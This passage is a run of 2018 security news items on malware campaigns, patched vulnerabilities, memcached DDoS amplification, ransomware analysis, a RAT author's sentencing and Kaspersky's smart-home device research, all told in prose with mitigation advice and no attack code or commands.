One of the applications observed by the researchers (CuteActress) was designed to send an SMS message to a premium service every time the user would use a functionality of the app. The threat would also delete all of these messages, thus erasing any evidence of these premium SMS.

reddrop malware cuteactress_v5

Currently, most of the infections were observed are in China, followed by Europe and America.

Android users that download apps from third-party sources and websites are most exposed to this threat, no instance of the RedDrop malware have been yet found on the Google Play store neither other official stores.


Hundreds of sites based on WordPress, Joomla and CodeIgniter infected by ionCube Malware
1.3.2018 securityaffairs
Virus

Security researchers at the firm SiteLock have discovered that hundreds of websites have been infected with the ionCube malware.
Security researchers at SiteLock have discovered that hundreds of websites have been infected with malware that masquerades as legitimate ionCube-encoded files.

ionCube is an encoding technology used to protect PHP software from being viewed, changed, and run on unlicensed computers.

The experts were analyzing an infected WordPress website when discovered a number of suspicious obfuscated files – such as “diff98.php” and “wrgcduzk.php” – appearing almost identical to legitimate ionCube-encoded files. Further analysis conducted revealed that hundreds of websites were infected by the same ionCube Malware.

“While reviewing an infected site, the SiteLock Research team found a number of suspiciously named, obfuscated files that appear almost identical to legitimate ionCube-encoded files. We determined the suspicious ionCube files were malicious, and found that hundreds of sites and thousands of files were affected.” reads the analysis published by SiteLock.

“Overall, our investigation found over 700 infected sites, totalling over 7,000 infected files.”

Further analysis revealed that attackers also compromised Joomla and CodeIgniter websites. Threat actors packed their malware in a manner that appears ionCube-encoded files.

The malicious code could theoretically infect any website based on a web server running PHP, once decoded, the fake ionCube files compose the ionCube malware.

“While there’s still some degree of obfuscation, the presence of the $_POST and $_COOKIE superglobals and the eval request at the end of the file reveal its true purpose: to accept and execute remotely supplied code.” continues the analysis. “It looks like the remote code supplied to this file is further obfuscated and there may be some sort of access control implemented, judging by the GUID-formatted string present.”

ionCube malware

The researchers also provided recommendations to mitigate the ionCube Malware, they suggest administrators check the presence of ionCube-encoded files as an indicator of compromise.

If an infection is detected, the scanning of the entire site is recommended, to completely eliminate the threat, the researchers also suggest the adoption of a web application firewall (WAF).

“If you find indicators of this infection, we strongly recommend having your site scanned for malware as soon as possible, as this malware seldom appears on its own.” concluded the analysis.

“This is especially important if you are using an ionCube-encoded application, as manually differentiating the malicious files from the legitimate ones is difficult, and it is common to see up to 100 slightly different variants of this malware on a single site. “


DPA Report: Russia-linked APT28 group hacked Germany’s government network
1.3.2018 securityaffairs APT  BigBrothers

Germany Government confirmed that hackers had breached its computer network and implanted a malware that was undetected for one year.
German news agency DPA reported that Russian hackers belonging to the APT28 group (aka Fancy Bear, Pawn Storm, Sednit, Sofacy, and Strontium) have breached Germany’s foreign and interior ministries’ online networks.

The agency, quoting unnamed security sources, revealed that the APT28 hackers planted malware in the ministries’ networks. The malicious code was undetected as long as a year.

“A Russian-backed hacker group known for many high-level cyber attacks was able to infiltrate the German government’s secure computer networks, the dpa news agency reported Wednesday.” reported the ABCnews.

The German Government discovered the intrusion in December but the experts believe that the hackers were inside the networks as long as a year. The DPA also added that hackers were able to penetrate an isolated government IT network.

“within the federal administration the attack was isolated and brought under control.” said the Interior Ministry that also confirmed an ongoing investigation.

“This case is being worked on with the highest priority and considerable resources,” the ministry added.

The hackers exfiltrated 17 gigabytes of data that could be used in further attacks against the German Government.

APT28 targets Germany

This isn’t the first time that Russia-linked APT28 was blamed for a cyber attack against Germany, in 2015 the APT group hacked into the systems of the German Parliament.

What will happen in the future?

Top German intelligence officials are requesting to the government to hack back attackers in case of a cyber attack from a foreign government


Victims of the GandCrab ransomware can decrypt their files for free using the decryptor
1.3.2018 securityaffairs
Ransomware

The GandCrab ransomware decryptor has been released by the Romanian Police (IGPR) under the supervision of the General Prosecutor’s Office (DIICOT) and in collaboration with the internet security company Bitdefender and Europol.
Bitdefender has teamed up with Europol, the Romanian Police, and the Directorate for Investigating Organized Crime and Terrorism (DIICOT) to release a free decryption tool for the infamous GandCrab Ransomware.
Early February experts at cyber security firm LMNTRIX have discovered a new ransomware-as-a-service dubbed GandCrab. advertised in Russian hacking community on the dark web.
GandCrab raas

The GandCrab was advertised in Russian hacking community, researchers noticed that authors leverage the RIG and GrandSoft exploit kits to distribute the malware.

Partners are prohibited from targeting countries in the Commonwealth of Independent States (Azerbaijan, Armenia, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan, Turkmenistan, Uzbekistan and Ukraine).

It has been estimated that the GandCrab ransomware has managed to infect approximately 50,000 computers, most of them in Europe, in less than a month asking from each victim for ransoms of $400 to $700,000 in DASH cryptocurrency.
“As of today, a new decryption tool for victims of the GandCrab ransomware is available on www.nomoreransom.org. This tool has been released by the Romanian Police (IGPR) under the supervision of the General Prosecutor’s Office (DIICOT) and in collaboration with the internet security company Bitdefender and Europol.” reads the announcement published by the Europol.“First detected one month ago, GandCrab has already made 50 000 victims worldwide, a vast number of which in Europe, making it one of the most aggressive forms of ransomware so far this year.”

Victims of GandCrab ransomware thanks to Bitdefender and the European law enforcement can recover files without paying the ransom.

“Ransomware has become a billion-dollar cash cow for malware authors, and GandCrab is one of the highest bidders,” Bitdefender’s Senior Director of the Investigation and Forensics Unit, Catalin Cosoi says.

“We are glad to provide our technical expertise in fighting cyber-crime as our long-standing mission is to protect the world’s Internet users and organizations. In the near future, we expect ransomware developers to migrate towards mining and stealing cryptocurrency”

GandCrab ransomware decrypter

The tool is available on Bitdefender’s website here, and through No More Ransom RansomFree.


Remotely Exploitable Flaws Patched in DHCP
1.3.2018 securityweek
Vulnerebility

Updates released by the Internet Systems Consortium (ISC) for the Dynamic Host Configuration Protocol (DHCP) software patch two remotely exploitable vulnerabilities discovered by a researcher at Google.

Felix Wilhelm of the Google Security Team found that the DHCP Client (dhclient), which provides a means for configuring network interfaces, is affected by a buffer overflow vulnerability that allows a malicious server to cause the client to crash.

In some cases, exploitation of the flaw could also lead to remote code execution, ISC said in an advisory. The security hole is tracked as CVE-2018-5732 and rated high severity.

“Where they are present, operating system mitigation strategies such as address space layout randomization (ASLR) should make it difficult to leverage this vulnerability to achieve remote code execution but we can not rule it out as impossible. The safest course is to patch dhclient so that the buffer overflow cannot occur,” ISC said.

The second vulnerability, CVE-2018-5733, is a medium severity issue that can be exploited to exhaust the memory available to the DHCP daemon (dhcpd), resulting in a denial-of-service (DoS) condition to clients.

“A malicious client which is allowed to send very large amounts of traffic (billions of packets) to a DHCP server can eventually overflow a 32-bit reference counter, potentially causing dhcpd to crash,” ISC said.

The flaws affect DHCP versions 4.1.0 through 4.1-ESV-R15, 4.2.0 through 4.2.8, 4.3.0 through 4.3.6, and 4.4.0. Fixes are included in versions 4.1-ESV-R15-P1, 4.3.6-P1 and 4.4.1.

ISC said there was no evidence that the vulnerabilities had been exploited for malicious purposes.

The organization has also informed customers of a vulnerability affecting BIND Supported Preview Edition, which is a customer-only, non-public version of BIND. The flaw, tracked as CVE-2018-5734 and rated high severity, can lead to an assertion failure, which typically causes the software to crash.


Emerson Patches Severe Flaw in ControlWave Controllers
1.3.2018 securityweek
Vulnerebility

Automation solutions provider Emerson has patched a potentially serious denial-of-service (DoS) vulnerability in its ControlWave Micro Process Automation Controller product.

ControlWave Micro Process Automation Controller is a hybrid remote terminal unit (RTU)/programmable logic controller (PLC) used around the world, particularly in the energy, and water and wastewater systems sectors.

According to an advisory published this week by ICS-CERT, this Emerson product is affected by a high severity stack-based buffer overflow vulnerability that can be exploited to force the device to enter “halt mode” by sending specially crafted packets on port 20547.Emerson fixes vulnerability in ControlWave Process Automation Controller

Emerson fixes vulnerability in ControlWave Process Automation Controller

“Exploitation may possibly cause a halt of Ethernet functionality, requiring a cold start to restore the system as well as communications related to ControlWave Designer access. This can possibly result in a loss of system availability and disruption in communications with other connected devices,” ICS-CERT said in its advisory.

The flaw, tracked as CVE-2018-5452, affects ControlWave Micro controllers running version 05.78.00 and prior of the firmware. Emerson patched the vulnerability with the release of version 05.79.00.

The security hole was reported to Emerson by Nozomi Networks, a company that specializes in cybersecurity and visibility solutions for industrial control systems (ICS). The firm, which recently raised $15 million in a Series B funding round, said it did not take long to find the flaw using a process it developed for testing ICS devices.

Moreno Carullo, co-founder and CTO of Nozomi, told SecurityWeek that the vulnerability can be exploited remotely over the Internet against devices that have port 20547 open. A Shodan search conducted by the company showed 163 potentially vulnerable devices, mainly in the United States, Canada and Mexico.

Carullo said the vulnerability was reported to Emerson in October 2017 and it was patched after roughly two months, which he described as “relatively fast compared to others.”


Siemens Releases BIOS Updates to Patch Intel Chip Flaws
28.2.2018 securityweek
Vulnerebility

Siemens has released BIOS updates for several of its industrial devices to patch vulnerabilities discovered recently in Intel chips, including Meltdown, Spectre and flaws affecting the company’s Management Engine technology.

Following the disclosure of the Meltdown and Spectre attack methods, industrial control systems (ICS) manufacturers immediately started analyzing the impact of the flaws on their products. Advisories have been published by companies such as Siemens, Rockwell Automation, Schneider Electric, ABB, and Pepperl+Fuchs.

Siemens has determined that the security holes expose many of its product lines to attacks, including RUGGEDCOM, SIMATIC, SIMOTION, SINEMA, and SINUMERIK.

The company informed customers recently that it has started releasing BIOS updates for some of its impacted products, including SIMATIC industrial PCs, SIMATIC field PG rugged laptops, SIMATIC industrial tablet PCs (ITP), and SINUMERIK panel control units (PCU). In addition to firmware patches, users have been advised to install operating system updates, which should mitigate the Meltdown flaw and one variant of Spectre.

The BIOS updates released by the company for the aforementioned SIMATIC and SINUMERIK devices also patch several vulnerabilities discovered last year by researchers in Intel’s Management Engine (ME), Server Platform Services (SPS), and Trusted Execution Engine (TXE) technologies.

The flaws impacting these Intel products can be exploited – in most cases locally, but at least one bug is remotely exploitable – for arbitrary code execution, privilege escalation, and denial-of-service (DoS) attacks.

The firmware updates from Siemens also fix a vulnerability affecting the Trusted Platform Module (TPM) in chips made by German semiconductor manufacturer Infineon.

The flaw, CVE-2017-15361, is related to the RSA library in TPM and it could allow a remote attacker who knows the public key to obtain the private RSA key. The security hole affects the products of several major tech firms, including Microsoft, Google, HP, Lenovo and Fujitsu.

Siemens has published separate advisories to inform users about the availability of patches for Meltdown/Spectre, Intel ME, and Infineon TPM vulnerabilities. ICS-CERT has so far published an advisory only for the Infineon issue.


Fake ionCube Malware Hits Hundreds of Sites
28.2.2018 securityweek
Virus

Hundreds of websites have been infected with malware that masquerades as legitimate ionCube-encoded files, SiteLock warns.

The malicious files were initially discovered in core directories of a WordPress site, featuring naming patterns usually associated with malware, namely “diff98.php” and “wrgcduzk.php.” Because the obfuscated files appear as if they had been encoded with ionCube, the researchers named the threat ionCube malware.

ionCube is an old and powerful PHP obfuscation technology that can be used to scramble text-based PHP files to hide the intellectual property. Due to licensing costs, ionCube isn’t usually used for malicious purposes.

Malicious attackers, however, found a way to pack their malware in a manner that resembles that of ionCube-encoded files, and started targeting various websites. Although the infection was initially spotted on a WordPress site, SiteLock's researchers discovered that Joomla and CodeIgniter sites have been infected as well.

According to SiteLock, the malware is likely to run on any web server running PHP, and could hide in plain sight by using filenames such as “inc.php” and “menu.php.” Overall, the researchers discovered over 7,000 infected files and say that over 700 sites were compromised.

Once decoded, the fake ionCube files turn into the malware itself, which still contains some obfuscation, along with some sort of access control, researchers discovered.

“While there’s still some degree of obfuscation, the presence of the $_POST and $_COOKIE superglobals and the eval request at the end of the file reveal its true purpose: to accept and execute remotely supplied code. It looks like the remote code supplied to this file is further obfuscated and there may be some sort of access control implemented, judging by the GUID-formatted string present,” SiteLock says.

Site administrators who haven’t specifically and intentionally installed ionCube-encoded files but do find such files on their servers were likely infected. If an infection is detected, the scanning of the entire site is recommended, to completely eliminate the threat.

According to SiteLock, differentiating between the fake and legitimate files can be very difficult as well, given the large number of malware variations out there. The researchers say it is common to see up to 100 slightly different variants of the malware on a single site.


Talos experts shared details of a remote code execution flaw in Adobe Acrobat Reader DC
28.2.2018 securityweek
Vulnerebility

Security experts at Cisco Talos disclosed details of a remote code execution flaw that affects Adobe Acrobat Reader DC versions 2018.009.20050 and 2017.011.30070 and earlier.
Security experts at Cisco Talos shared details of a remote code execution vulnerability tracked as CVE-2018-4901, that affects Adobe Acrobat Reader DC.

A remote attacker can exploit the vulnerability tricking the victim into opening a malicious file or visiting a specially crafted webpage.

The flaw affects Adobe Acrobat Reader versions 2018.009.20050 and 2017.011.30070 and earlier. The vulnerability was disclosed on Dec. 7 and Adobe addressed it a few days ago, on February 13.

“Adobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability.” reads the analysis published by the Talos team.

Adobe classified the flaw with a “priority 2” level that equals to “important”, this means that there is an “elevated risk” of exploitation. The good news is that there are currently no known exploits in the wild.

The researchers explained that the flaw could be used by attackers to embed a malicious JavaScript code in a PDF file to use document ID to perform unauthorized operations to trigger a stack-based buffer overflow when opening a specially crafted PDF document.

“A specific Javascript script embedded in a PDF file can cause the document ID field to be used in an unbounded copy operation leading to stack-based buffer overflow when opening a specially crafted PDF document in Adobe Acrobat Reader,” continues Talos.

Researchers at Talos also released Snort rules 45102-3 that could be used by administrators to detect exploitation attempts.


Experts warn Memcached DDoS attacks could be soon a dangerous threat
28.2.2018 securityweek
Attack

Security experts started observing a dangerous trend in DDoS amplification technique, Memcached DDoS Attacks.
Security experts from some security firms have reported that threat actors have started abusing the memcached protocol to power distributed denial-of-service (DDoS) Attacks, so-called memcached DDoS attacks.

Memcached is a free and open source, high-performance, distributed memory caching system designed to speed up dynamic web applications by alleviating database load.

Clients communicate with memcached servers via TCP or UDP on port 11211.

Researchers from Cloudflare, Arbor Networks and security firm Qihoo 360 discovered that recently attackers are abusing the memcached for DDoS amplification attacks.

Chinese experts warned about abuses of memcached DDoS attacks in November.

Experts at Cloudflare dubbed this type of attack Memcrashed.

“Over last couple of days we’ve seen a big increase in an obscure amplification attack vector – using the memcached protocol, coming from UDP port 11211.” reads the analysis published by Cloudflare.

“An IP-spoofing capable attacker sends forged requests to a vulnerable UDP server. The UDP server, not knowing the request is forged, politely prepares the response. The problem happens when thousands of responses are delivered to an unsuspecting target host, overwhelming its resources – most typically the network itself.“

The involvement of memcached servers in DDoS Attacks is quite simple, the attacker sends a request to the targeted server on port 11211 spoofing the IP address of the victim. In a memcached DDoS attack, the request sent to the server is composed of a few bytes, while the response can be tens of thousands of times bigger, resulting in an amplification attack.

memcached DDoS attack

The researchers at Cloudflare observed a memcached DDoS attack that peaked at 260 Gbps while Arbor Networks reported observing attacks that peaked at 500 Gbps and even more.

“We have observed a considerable uptick in memcached reflection/amplification attacks ranging in size from a few hundred mb/sec up to 500gb/sec and larger. The amplified attack traffic is sourced from UDP/11211, with a packet size of 1428 bytes (1442 bytes with layer-2 Ethernet framing included), and no fragmentation (memcached segments large responses at layer-7, as does ntp).” reads the analysis published by Arbor Networks. “The attacker typically ‘primes’ a given set of memcached reflectors/amplifiers with arbitrary-length key/value pairs, and then issues memcached queries for those key/value pairs, spoofing the IP addresses of targeted hosts/networks.”

Researchers at Arbor Networks added that attackers can also send queries at TCP port 11211, but since TCP queries cannot be reliably spoofed, the hackers opted for UDP.

“I was surprised to learn that memcached does UDP, but there you go! The protocol specification shows that it’s one of the best protocols to use for amplification ever! There are absolutely zero checks, and the data WILL be delivered to the client, with blazing speed! Furthermore, the request can be tiny and the response huge (up to 1MB).” continues the analysis published by Cloudflare.

“Launching such an attack is easy. First the attacker implants a large payload on an exposed memcached server. Then, the attacker spoofs the “get” request message with target Source IP.”

According to Cloudflare, most of the memchached DDoS Attacks were launched from servers in North America and Europe, the majority of them is hosted by OVH, DigitalOcean, and Sakura.

memcached DDoS attack sources

The experts observed attacks from roughly 5,700 unique IPs associated with memcached servers.

The situation can rapidly get worse because the result of a simple Shodan query shows nearly 88,000 unsecured memchached servers, most of them in the United States, China and France.

Cloudflare recommends disabling UDP support unless it’s needed and isolating memcached servers from the Internet. Internet service providers have to fix vulnerable protocols and prevent IP spoofing.

“Internet Service Providers – In order to defeat such attacks in future, we need to fix vulnerable protocols and also IP spoofing. As long as IP spoofing is permissible on the internet, we’ll be in trouble.” concluded Cloudflare.

“Developers – Please please please: Stop using UDP. If you must, please don’t enable it by default. If you do not know what an amplification attack is I hereby forbid you from ever typing
SOCK_DGRAM
into your editor.”


Memcached Servers Abused for Massive Amplification DDoS Attacks
28.2.2018 thehackernews
Attack

Cybercriminals have figured out a way to abuse widely-used Memcached servers to launch over 51,000 times powerful DDoS attacks than their original strength, which could result in knocking down of major websites and Internet infrastructure.
In recent days, security researchers at Cloudflare, Arbor Networks, and Chinese security firm Qihoo 360 noticed that hackers are now abusing "Memcached" to amplify their DDoS attacks by an unprecedented factor of 51,200.
Memcached is a popular open-source and easily deployable distributed caching system that allows objects to be stored in memory and has been designed to work with a large number of open connections. Memcached server runs over TCP or UDP port 11211.
The Memcached application has been designed to speed up dynamic web applications by reducing stress on the database that helps administrators to increase performance and scale web applications. It's widely used by thousands of websites, including Facebook, Flickr, Twitter, Reddit, YouTube, and Github.
Dubbed Memcrashed by Cloudflare, the attack apparently abuses unprotected Memcached servers that have UDP enabled in order to deliver DDoS attacks 51,200 times their original strength, making it the most prominent amplification method ever used in the wild so far.
How Memcrashed DDoS Amplification Attack Works?

Like other amplification methods where hackers send a small request from a spoofed IP address to get a much larger response in return, Memcrashed amplification attack also works by sending a forged request to the targeted server (vulnerable UDP server) on port 11211 using a spoofed IP address that matches the victim's IP.
According to the researchers, just a few bytes of the request sent to the vulnerable server can trigger the response of tens of thousands of times bigger.
"15 bytes of request triggered 134KB of response. This is amplification factor of 10,000x! In practice we've seen a 15-byte request result in a 750kB response (that's a 51,200x amplification)," Cloudflare says.
According to the researchers, most of the Memcached servers being abused for amplification DDoS attacks are hosted at OVH, Digital Ocean, Sakura and other small hosting providers.
In total, researchers have seen only 5,729 unique source IP addresses associated with vulnerable Memcached servers, but they are "expecting to see much larger attacks in future, as Shodan reports 88,000 open Memcached servers." Cloudflare says.
"At peak we've seen 260Gbps of inbound UDP memcached traffic. This is massive for a new amplification vector. But the numbers don't lie. It's possible because all the reflected packets are very large," Cloudflare says.
Arbor Networks noted that the Memcached priming queries used in these attacks could also be directed towards TCP port 11211 on abusable Memcached servers.

But TCP is not currently considered a high-risk Memcached reflection/amplification vector because TCP queries cannot be reliably spoofed.
The popularly known DDoS amplification attack vectors that we reported in the past include poorly secured domain name system (DNS) resolution servers, which amplify volumes by about 50 times, and network time protocol (NTP), which increases traffic volumes by nearly 58 times.
Mitigation: How to Fix Memcached Servers?
One of the easiest ways to prevent your Memcached servers from being abused as reflectors is firewalling, blocking or rate-limiting UDP on source port 11211.
Since Memcached listens on INADDR_ANY and runs with UDP support enabled by default, administrators are advised to disable UDP support if they are not using it.
The attack size potentially created by Memcached reflection cannot be easily defended against by Internet Service Providers (ISPs), as long as IP spoofing is permissible on the internet.


Hacker Who Never Hacked Anyone Gets 33-Month Prison Sentence
28.2.2018 thehackernews Crime

A hacker who was arrested and pleaded guilty last year—not because he hacked someone, but for creating and selling a remote access trojan that helped cyber criminals—has finally been sentenced to serve almost three years in prison.
Taylor Huddleston, 26, of Hot Springs, Arkansas, pleaded guilty in July 2017 to one charge of aiding and abetting computer intrusions by building and intentionally selling a remote access trojan (RAT), called NanoCore, to hackers for $25.
Huddleston was arrested in March, almost two months before the FBI raided his house in Hot Springs, Arkansas and left with his computers after 90 minutes, only to return eight weeks later with handcuffs.
This case is a rare example of the US Department of Justice (DOJ) charging someone not for actively using malware to hack victims' computers, but for developing and selling it to other cybercriminals.
Huddleston admitted to the court that he created his software knowing it would be used by other cybercriminals to break the law.
He initially started developing NanoCore in late 2012 with a motive to offer a low-budget remote management software for schools, IT-conscious businesses, and parents who desired to monitor their children's activities on the web.

However, Huddleston marketed and sold the NanoCore RAT for $25 in underground hacking forums that were extremely popular with cybercriminals around the world from January 2014 to February 2016. He then sold ownership of NanoCore to a third-party in 2016.
NanoCore RAT happens to be popular among cybercriminals on underground hacking forums and has been linked to intrusions in at least ten countries. Among the victims was a high-profile assault on Middle Eastern energy firms in 2015.
Huddleston also agreed with prosecutors that NanoCore RAT and available third-party plugins offered a full set of features including:
Stealing sensitive information from victim computers, such as passwords, emails, and instant messages.
Remotely activating and controlling connected webcams on the victims' computers in order to spy on them.
Ability to view, delete, and download files.
Locking infected PCs and holding them to ransom.
Using infected PCs to launch distributed denial of service (DDoS) attacks on websites and similar services.
In July plea, Huddleston also took responsibility for creating and operating a software licensing system called "Net Seal" that was used by another suspect, Zachary Shames, to sell thousands of copies of Limitless keylogger.
Shames used Net Seal to infect 3,000 people that were, in turn, used it to infect 16,000 computers, according to the DoJ.
In his guilty plea, Huddleston admitted that he intended his products to be used maliciously.
Besides the 33-month prison sentence handed down by judges on Friday, Huddleston also gets two years of supervised release.


Intel Releases Spectre Patches for Broadwell, Haswell CPUs
28.2.2018 securityweek 
Vulnerebility

Intel has released new firmware updates for its Broadwell and Haswell processors to address the Spectre vulnerability.

After the first round of Spectre patches released by the company caused more frequent reboots and other instability problems, Intel started working on new microcode updates.

The company first released new firmware updates for its Skylake processors, and last week it announced the availability of patches for several other CPUs, including Kaby Lake and Coffee Lake.

This week, the company updated the list of available firmware patches to state that the fixes for Haswell and Broadwell processors are also ready for use in production environments.

As of February 28, patches that can be deployed in production environments are available for the following products: Anniedale/Moorefield, Apollo Lake, Avoton/Rangeley, Broadwell (except Server EX), Broxton, Cherry View, Coffee Lake, Cougar Mountain, Denverton, Gemini Lake, Haswell (except Server EX), Kaby Lake, Knights Landing, Knights Mill, Skylake, SoFIA, Tangier, Valleyview/Bay Trail, and XGold.

Beta patches have been provided to OEMs for validation for Gladden, some Ivy Bridge, Sandy Bridge, and Skylake Xeon E3 processors. The microcode updates for Broadwell and Haswell Server EX processors, specifically the Xeon E7v4 and E7v3 product families, are also in beta phase.

As for the remaining CPUs, updates are either in pre-beta or planning phase, but pre-mitigation microcode updates are available for many of these products.

The patches will be delivered as OEM firmware updates. Device manufacturers started releasing BIOS updates to patch the Meltdown and Spectre vulnerabilities shortly after their disclosure, but a majority of firms decided to halt the updates due to instability issues. Some vendors have now resumed the distribution of firmware updates.

Meltdown attacks are possible due to a vulnerability tracked as CVE-2017-5754, while Spectre attacks are possible due to flaws tracked as CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). Meltdown and Spectre Variant 1 can be patched with software updates, but Spectre Variant 2 requires microcode updates for a complete fix.

Intel and AMD claim they are working on processors that will have built-in protections against these types of exploits.

Intel faces more than 30 lawsuits, including ones filed by customers and shareholders, over the Meltdown and Spectre vulnerabilities.


CSE Malware ZLab – Malware Analysis Report: A new variant of Mobef Ransomware
28.2.2018 securityaffairs
Ransomware

Malware researchers at CSE Cybsec – ZLab have analyzed a new variant of Mobef ransomware, a malware that in the past mainly targeted Italian users.
Malware researchers at CSE Cybsec – ZLab have analyzed a new variant of Mobef ransomware, that was involved in past attacks against Italian users.

I personally obtained the sample by researchers at @MalwareHunterTeam and the Italian expert @Antelox and passed it to the experts at the ZLab.

24 Feb

MalwareHunterTeam
@malwrhunterteam
Thanks to @Antelox, we now have a sample for the ransomware that is targeting Italy (https://twitter.com/malwrhunterteam/status/967132494104530947 …): https://www.virustotal.com/en/file/aa2c9c02def2815aa24f5616051aa37e4ce002e62f507b3ce15aac191a36e162/analysis/1518986221/ …
Interesting packing/protection, maybe it's worth to dig into @hasherezade @VK_Intel.@BleepinComputer @demonslay335
cc @JAMESWT_MHT @forensico


MalwareHunterTeam
@malwrhunterteam
Seems it's a new version of Mobef (or maybe not even a new version, just a new note). Note that most of Mobef victims we seen in past year also were from Italy.
For this, we only seen victims from Italy till now. 1st on 16th this month.
The above sample also seen from Italy...

7:45 PM - Feb 24, 2018
7
See MalwareHunterTeam's other Tweets
Twitter Ads info and privacy
Like a classic ransomware, it encrypts all user files without changing the file extension and drops a file containing the instructions on how to pay the ransom.

Mobef ransomware
Mobef ransomware note

The analysis revealed that the ransomware was written in Delphi 4 and it doesn’t include useful strings. The Import Address Table is empty, this means that the malware isn’t as trivial as seems because it uses some technique to avoid the analysis.

After the execution, the ransomware creates three files:

4YOU: it contains the ransom note as shown in the popup window; it is stored in each folder in which there are encrypted files.
KEI: it contains the personal key used to identify the victim; it is stored in each folder in which there are encrypted files.
log: it contains the list of the encrypted files and it is stored in “C:\Windows”. This file represents also the kill-switch of the malware and the filename is the same for every infection.
Mobef ransomware
Mobef ransomware – List of encrypted files

Once the encryption phase is complete, the new variant of the Mobef ransomware will try to contact an external server “mutaween.sa”, to exfiltrate a series of information.

It is interesting to note that the domain “mutaween.sa” doesn’t exist, it isn’t currently resolved by the DNS servers.

A deep analysis of the Mobef ransomware revealed that it implements a number of functionalities, such as the capability to encrypt files, not only on the local drive but also on removable drives and network shares.

Further details on the Mobef ransomware and Yara Rules are included in the report published by researchers at ZLAb.


IoT hack: how to break a smart home… again
28.2.2018 Kaspersky  IoT
There can never be too many IoT gadgets – that’s what people usually think when buying yet another connected device with advanced functionality. From our perspective, we also think there can’t be too many IoT investigations. So, we have continued our experiments into checking and uncovering how vulnerable they are, and followed up our research focusing on smart home devices.

Researchers have already been analyzing connected devices for many years, but concerns around cybersecurity in the IoT world are still there, putting users under significant risk. In our previous analysis, possible attack vectors affecting both a device and a network to which it’s connected have been discovered. This time, we’ve chosen a smart hub designed to control sensors and devices installed at home. It can be used for different purposes, such as energy and water management, monitoring and even security systems.

This tiny box receives information from all the devices connected to it, and if something happens or goes wrong, it immediately notifies its user via phone, SMS or email in accordance with its preferences. An interesting thing is that it is also possible to connect the hub to local emergency services, thus alerts will be sent to them accordingly. So, what if someone was able to interrupt this smart home’s system and gain control over home controllers? It could turn life into a nightmare not only for its user, but also for the emergency services. We decided to check a hypothesis and as a result discovered logical vulnerabilities providing cybercriminals with several attack vectors opportunities.

Physical access
First, we decided to check what could be available for exploitation by an attacker being outside of the network. We discovered that the hub’s firmware is available publicly and can be downloaded without any subscription from the vendor’s servers. Therefore, once downloading it, anyone can easily revise the files inside it and analyze them.

We found that the password from the root account in the shadow file is encrypted with the Data Encryption Standard (DES) algorithm. As practice shows, this cryptographic algorithm is not considered to be secure or highly resistant to hacking, and therefore it is possible for an attacker to successfully obtain the hash through brute-force and find out the ‘root’ password.

To access the hub with ‘root’ rights and therefore modify files or execute different commands, physical access is needed. However, we don’t neglect the hardware hacking of devices and not all of them survive afterwards.

We explored the device physically, but of course not everyone would be able to do this. However, our further analysis showed there are other options to gain remote access over it.

Remote access
For hub control, users can either use a special mobile application or a web-portal through which they can set up a personal configuration and check all the connected systems.

To implement it, the owner sends a command for synchronization with the hub. At that moment, all settings are packed in the config.jar file, which the hub then downloads and implements.

But as we can see, the config.jar file is sent through HTTP and the device’s serial number is used as the device identifier. So, hackers can send the same request with an arbitrary serial number, and download an archive.

Some might think that serial numbers are very unique, but developers prove otherwise: serial numbers are not very well protected and can be brute-forced with a byte selection approach. To check the serial number, remote attackers can send a specially crafted request, and depending on the server’s reply, will receive information if the device is already registered in the system.

Moreover, our initial research has shown that users, without even realizing it, put themselves at risk by publishing their tech reviews online or posting photos of a hub in social networks and openly presenting devices’ serial numbers. And the security consequences will not be long in coming.

While analyzing the config.jar file archive, we found that it contains login and password details – all the necessary data to access a user’s account through the web-interface. Although the password is encrypted in the archive, it can be broken by hash decryption with the help of publicly available tools and open-sourced password databases. Importantly, during the initial registration of a user account in the system, there are no password complexity requirements (length, special characters, etc.). This makes password extraction easier.

As a result, we gained access to a user’s smart home with all the settings and sensor information being available for any changes and manipulations. The IP address is also listed there.

It is also possible that there might be other personal sensitive information in the archive, given the fact that users often upload their phone numbers into the system to receive alerts and notifications.

Thus, the few steps involved with generating and sending the right requests to the server can provide remote attackers with the possibility of downloading data to access the user’s web interface account, which doesn’t have any additional security layers, such as 2FA (Two Factor Authentication). As a result, attackers can take control over someone’s home and turn off the lights or water, or, even worse, open the doors. So, one day, someone’s smart life could be turned into a complete nightmare. We reported all the information about the discovered vulnerabilities to the vendor, which are now being fixed.

But there is always light at the end of the tunnel…
In addition to smart “boxes”, we had something smaller in our pocket – a smart light bulb, which doesn’t have any critical use, neither for safety or security. However, it also surprised us with a few – but still worrying – security issues.

The smart bulb is connected to a Wi-Fi network and controlled over a mobile application. To set it up a user needs to first download the mobile application (iOS or Android), switch on the bulb, connect to the Wi-Fi access point created by the bulb and provide the bulb with the SSID and password from a local Wi-Fi network.

From the application, users can switch it ON and OFF, set timers and change different aspect of the light, including its density and color. Our goal was to find out if the device might help an attacker in any way to gain access to a local network, from which it would eventually be possible to conduct an attack.

After several attempts, we were lucky to discover a way to get to the device’s firmware through the mobile application. An interesting fact is that the bulb does not interact with the mobile application directly. Instead, both the bulb and the mobile application are connected to a cloud service and communication goes through it. This explains why while sniffing the local network traffic, almost no interaction between the two were found.

We discovered that the bulb requests a firmware update from the server and downloads it through an HTTP protocol that doesn’t secure the communication with servers. If an attacker is in the same network, a man-in-the-middle kind of attack will be an easy task.

The hardware reconnaissance with flash dumping led us not only to the firmware, but to user data as well. With a quick look at the information shared with the cloud, no sensitive information seems to have been uploaded from the device or the internal network. But we found all the credentials of the Wi-Fi networks to which the bulb had connected before, which are stored in the device’s flash forever with no encryption – even after a “hard” reset of the device this data was still available. Thus, reselling it on online market places is certainly not a good idea.

Get ready
Our latest research has once again confirmed that ‘smart home’ doesn’t mean ‘secure home’. Several logical vulnerabilities (combined with an unconsciously published serial number) can literally open doors to your home and welcome in cybercriminals. Besides this, remote access and control over your smart hub can lead to a wide range of sabotage activities, which could cost you through high electricity bills, a flood or, even more importantly, your mental health.

But even if your smart hub is secure, never forget that the devil is in the details: a tiny thing such as a light bulb could serve as an entry-point for hackers as well, providing them with access to a local network.

That’s why it’s highly important for users to follow these simple cyber hygiene rules:

Always change the default password. Instead use a strict and complex one. Don’t forget to update it regularly.
